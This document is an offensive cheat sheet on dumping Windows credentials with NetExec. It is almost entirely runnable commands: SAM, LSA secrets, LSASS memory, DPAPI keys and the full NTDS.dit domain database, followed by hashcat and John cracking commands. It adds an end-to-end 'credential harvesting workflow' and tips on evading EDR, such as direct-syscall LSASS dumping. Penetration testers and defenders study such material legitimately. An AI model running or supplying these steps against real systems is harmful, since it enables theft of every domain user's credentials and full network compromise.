Credential Dumping with NetExec

#Overview

Credential dumping is the extraction of password hashes, cached credentials, and authentication material from Windows systems. NetExec provides multiple dumping methods — from lightweight SAM extraction to full NTDS.dit domain database exfiltration. Each method has different privilege requirements, noise levels, and output formats.

#Prerequisites

Administrative privileges on target (local admin for SAM/LSA, Domain Admin for NTDS)
Network access to SMB (445/TCP)
Understanding of hash formats and offline cracking tools

#SAM Dump (Local Account Hashes)

Extracts local user account hashes from the Security Account Manager (SAM) registry hive.

# Dump SAM via SMB (requires local admin)
netexec smb 10.10.10.5 -u administrator -p pass --sam
#   Output format: username : RID : LM_hash : NT_hash :::

# Dump SAM with pass-the-hash
netexec smb 10.10.10.5 -u administrator -H ':NTHASH' --sam

# Dump SAM across multiple hosts
netexec smb targets.txt -u administrator -p pass --sam --continue-on-success

BASH

Output interpretation:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99:::
#   username   :RID : LM_hash                          : NT_hash                          :::

TEXT

aad3b435b51404eeaad3b435b51404ee as LM hash = LM disabled or blank (normal on modern Windows)
31d6cfe0d16ae931b73c59d7e0c089c0 as NT hash = empty password
Guest account RID = 501, Administrator RID = 500

#LSA Dump (Cached Credentials and Secrets)

Extracts LSA secrets including cached domain credentials, service account passwords, and DPAPI keys.

# Dump LSA secrets (requires local admin)
netexec smb 10.10.10.5 -u administrator -p pass --lsa
#   Output: cached domain logon credentials (DCC2 hash format)
#           service account passwords in plaintext
#           DPAPI system keys

# Dump LSA with pass-the-hash
netexec smb 10.10.10.5 -u administrator -H ':NTHASH' --lsa

BASH

What LSA secrets contain:

NL$KM — DPAPI decryption key (unlocks browser passwords, scheduled task credentials)
DefaultPassword — auto-logon password (if configured)
Cached domain credentials — MSCACHEv2 hashes of recent domain logons
Service account passwords — plaintext passwords for services running as domain accounts

#NTDS.dit Dump (Full Domain Database)

Extracts the entire Active Directory database — every user hash, group membership, and trust relationship.

# Dump NTDS via SMB (requires Domain Admin or equivalent)
netexec smb 10.10.10.5 -u domain_admin -p pass --ntds
#   Requires: Replicating Directory Changes permission (Domain Admin by default)
#   Output: every domain user's NTLM hash, Kerberos keys, group memberships

# Dump NTDS with pass-the-hash
netexec smb 10.10.10.5 -u domain_admin -H ':NTHASH' --ntds

BASH

Post-dump processing:

# Extract hashes from NTDS.dit for offline cracking
impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL
#   Output: all domain user hashes in hashcat-compatible format

BASH

#lsassy Module (Remote LSASS Dump)

Remotely dumps the LSASS process memory and extracts credentials — without writing files to disk on the target.

# Dump LSASS via lsassy module (requires local admin)
netexec smb 10.10.10.5 -u administrator -p pass -M lsassy
#   Method: uses comsvcs.dll to create a minidump of LSASS
#   Output: credentials extracted from LSASS memory (saved to workspace)

# Specify dump method
netexec smb 10.10.10.5 -u administrator -p pass -M lsassy -o METHOD=2
#   Method 0: comsvcs.dll (default, most reliable)
#   Method 1: procdump.exe (requires upload)
#   Method 2: dumpert (direct syscall, bypasses some EDR)
#   Method 3: nanodump (PowerShell-based)

# Dump across multiple hosts
netexec smb targets.txt -u administrator -p pass -M lsassy --continue-on-success

BASH

Output location:

~/.netexec/workspaces/<workspace>/lsassy/
#   Contains: extracted credentials in multiple formats

TEXT

#DPAPI Dump (Data Protection API Keys)

Extracts DPAPI master keys used to decrypt protected data (browser passwords, scheduled task credentials, certificate private keys).

# Dump DPAPI master keys (requires local admin)
netexec smb 10.10.10.5 -u administrator -p pass --dpapi
#   Output: DPAPI master keys and domain backup keys

# Use DPAPI keys to decrypt browser passwords
# (Requires additional tools: dpapi.py or Mimikatz)

BASH

#Combining Dumps for Maximum Coverage

# Full credential harvesting workflow
# Step 1: SAM (local accounts)
netexec smb 10.10.10.5 -u admin -p pass --sam > sam_hashes.txt

# Step 2: LSA (cached domain + service accounts)
netexec smb 10.10.10.5 -u admin -p pass --lsa > lsa_secrets.txt

# Step 3: LSASS (active sessions + plaintext passwords)
netexec smb 10.10.10.5 -u admin -p pass -M lsassy

# Step 4: DPAPI (for decrypting stored credentials)
netexec smb 10.10.10.5 -u admin -p pass --dpapi

# Step 5 (if Domain Admin): NTDS (entire domain)
netexec smb 10.10.10.5 -u domain_admin -p pass --ntds

BASH

#Offline Cracking Integration

#Hashcat

# NTLM hashes (mode 1000)
hashcat -m 1000 sam_hashes.txt /usr/share/wordlists/rockyou.txt --force

# NetNTLMv2 (mode 5600) — from Responder captures
hashcat -m 5600 netntlm_hashes.txt /usr/share/wordlists/rockyou.txt --force

# Kerberos TGS (mode 13100) — from Kerberoasting
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force

# Kerberos AS-REP (mode 18200) — from AS-REP roasting
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force

# MSCACHEv2 / DCC2 (mode 2100) — from LSA cached credentials
hashcat -m 2100 cached_hashes.txt /usr/share/wordlists/rockyou.txt --force

# DPAPI master key (mode 15300) — from DPAPI dump
hashcat -m 15300 dpapi_masterkey.txt /usr/share/wordlists/rockyou.txt --force

BASH

#John the Ripper

# NTLM
john sam_hashes.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt

# Kerberos TGS
john kerberoast.txt --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt

# MSCACHEv2
john cached_hashes.txt --format=mscash2 --wordlist=/usr/share/wordlists/rockyou.txt

BASH

#Common Pitfalls

⚠️ SAM requires admin: SAM dump fails without local admin. Check for (Pwn3d!) indicator first.
⚠️ NTDS requires Domain Admin: Or equivalent (Replicating Directory Changes + Replicating Directory Changes All permissions). Enterprise Admin also works.
⚠️ lsassy blocked by EDR: Most EDR products hook LSASS access. Try different methods (0–3) or use alternative tools (Mimikatz with custom injection).
⚠️ DPAPI needs domain backup key: For domain-encrypted DPAPI blobs, you need the domain DPAPI backup key (from NTDS or LSA dump on a DC).
⚠️ Empty LM hash is normal: aad3b435b51404eeaad3b435b51404ee means LM is disabled (default since Vista/Server 2008). Don't waste time cracking it.
⚠️ MSCACHEv2 is slow to crack: Unlike NTLM (fast), MSCACHEv2 uses PBKDF2 with 10240 iterations. Hashcat rate is ~1/100th of NTLM speed.

#OPSEC Considerations

Method	Noise Level	Key Artifacts	EDR Detection
SAM dump	High	Service creation (7045), registry read, temp files	Medium
LSA dump	High	Service creation, registry read, temp files	Medium
NTDS dump	Very High	Massive SMB traffic, volume shadow copy (if used)	High
lsassy (Method 0)	High	LSASS process access, minidump creation	Very High
lsassy (Method 2)	Medium	Direct syscalls, bypasses userland hooks	Medium
lsassy (Method 3)	Medium	PowerShell process, ScriptBlock logging	Medium
DPAPI dump	Medium	Registry read, file access	Low

#Post-Exploitation Value

SAM hashes → local admin on this host, check for hash reuse across network
LSA secrets → cached domain credentials, service account plaintext passwords
NTDS.dit → complete domain compromise evidence, every user hash
lsassy output → active session credentials, plaintext passwords in memory
DPAPI keys → browser passwords, RDP saved credentials, scheduled task credentials

#Cross-References

SMB Operations — SMB protocol for dump operations
AD Attacks via NetExec — Using dumped credentials in attack chains
LSASS & Credentials — Manual LSASS dumping
DCSync & Golden Ticket — Alternative domain dump method
Credential Hunting — Finding credentials beyond hash dumping

#Tool References

NetExec SMB Documentation
lsassy Module — LSASS dump module details
Impacket secretsdump — Offline NTDS/SAM extraction
Hashcat — GPU-accelerated hash cracking